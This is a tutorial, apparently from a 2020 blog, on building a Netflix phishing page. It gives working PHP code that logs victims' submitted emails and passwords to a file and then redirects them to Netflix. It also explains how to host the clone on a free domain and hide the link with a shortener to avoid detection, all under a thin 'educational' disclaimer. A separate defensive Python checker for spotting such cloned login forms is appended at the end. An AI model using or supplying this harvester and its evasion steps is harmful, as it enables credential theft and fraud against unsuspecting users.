How to Create a Phishing Page for Netflix?




By Yugansh Kumar       September 27, 2020





Ever wondered how hackers steal your critical data or credentials through social engineering or a phishing scam? In this tutorial, let's see how hackers can steal your valuable data via a phishing scam. The first question that comes to mind is: what is phishing?

Disclaimer: This tutorial is strictly for educational purposes only. Do not misuse it. We will not be responsible if it is misused, and please do not use this tutorial for illegal activities!

Phishing

Phishing is the art of stealing a person's credentials by presenting them with a look-alike of the page or website where they normally enter those credentials. There are tons of ways to phish, but we'll be looking at a method that is simple and doesn't require any programming knowledge.

Building a Phishing page for Netflix

First, visit the Netflix login page and save the source code to your PC (Ctrl+S).

After downloading the source code, open it in an editor (VS Code in this case) and search (Ctrl+F) for action=. The form's action attribute will be highlighted. Change its URL to a phishingaction.php file, which contains PHP code to capture the request and forward the user to the original Netflix website.

Source code for Netflix Login Page.

Creating a PHP File for Password Harvesting

<?php

header (‘Location: https://www.netflix.com/in/login’);

$handle = fopen(“log.txt”, “a”);

foreach($_POST as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n\n\n\n”);

fclose($handle);

exit;

?>

Same as above, save the PHP file with the type set to “All Files” and the name “phishingaction.php”. Change the encoding to Unicode and you should be ready to go!

Testing the changes in Xampp

Before moving it to the main hosting service, let us check whether it works in Xampp.

Phishing page

As you can clearly see in the URL, this webpage is running on localhost. After the Sign In button is clicked, it executes the PHP script and redirects the user to the original Netflix website.

It creates a log file, as specified in the PHP script.

As you can see above, the email ID and password are here in plain text.

As we can see, this log file contains the user's details, such as the username and password, which means our phishing page works. Now let's host this as a website using a free domain from 000.webhost.com.

Hosting the website on a free domain

We will be using the services of 000.webhost.com, which provides free domains. I will register the domain with the name Netflix000 and then shorten the link using any link shortener so it doesn't get caught.

After completing the formalities required to register a domain, we save our .html and .php files there, both named Index because the host does not allow other names, and check whether it contains an .htaccess file. Once these requirements are met, save the files and view the website.


Now let us confirm that the page is working by taking a use case.


Voila! The trick works, and you have finished hosting your first phishing site! Navigate to your site and enter some fake login details. After you click the login button, it should redirect you to Netflix.com. Log in to the FTP server where you hosted the index.html file, and there should be a new file called Log.txt stored in the same folder as your index.php file. Any login details should be stored there. Remember, please don't use this for malicious purposes; only use it for penetration testing and with authorization from your victims. I hope you now understand how phishing pages work. If you face any difficulties, feel free to leave a comment. 😃
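From the defender's side, the cloned page described above has a recognizable shape: it keeps the brand's title, but its password form posts to a host that is not one of the brand's domains. The check below is an added example, not code from the original tutorial; BRAND_DOMAINS, BRAND_KEYWORD, LoginFormParser, check_page and the SAMPLE markup are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

BRAND_DOMAINS = {"netflix.com"}  # assumption: domains the brand really logs in on
BRAND_KEYWORD = "netflix"        # assumption: keyword expected in the page title
# Constructed sample: a saved login page whose form action was changed to a local script.
SAMPLE = ('<title>Netflix</title><form method="post" action="phishingaction.php">'
          '<input type="text" name="email"><input type="password" name="password"></form>')

class LoginFormParser(HTMLParser):
    """Records the page title and the action of each form holding a password field."""
    def __init__(self):
        super().__init__()
        self.title, self.actions = "", []
        self._in_title, self._form = False, None  # _form = [action, has_password]

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "form":
            self._form = [a.get("action") or "", False]
        elif tag == "input" and self._form and (a.get("type") or "").lower() == "password":
            self._form[1] = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "form" and self._form:
            if self._form[1]:
                self.actions.append(self._form[0])
            self._form = None

    def handle_data(self, data):
        if self._in_title:
            self.title += data

def on_brand_domain(host):
    host = (host or "").lower()
    return any(host == d or host.endswith("." + d) for d in BRAND_DOMAINS)

def check_page(page_url, html):
    """Return the off-brand hosts that a brand-titled page's password forms post to."""
    p = LoginFormParser()
    p.feed(html)
    p.close()
    if BRAND_KEYWORD not in p.title.lower():
        return []
    # Relative actions (as in a locally edited copy) resolve against the page URL.
    hosts = [urlparse(urljoin(page_url, a)).hostname for a in p.actions]
    return [h for h in hosts if not on_brand_domain(h)]
```

An empty list means nothing was flagged; a mail gateway or web proxy could run a check of this kind on pages reached from links in inbound messages, after following any link shortener.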

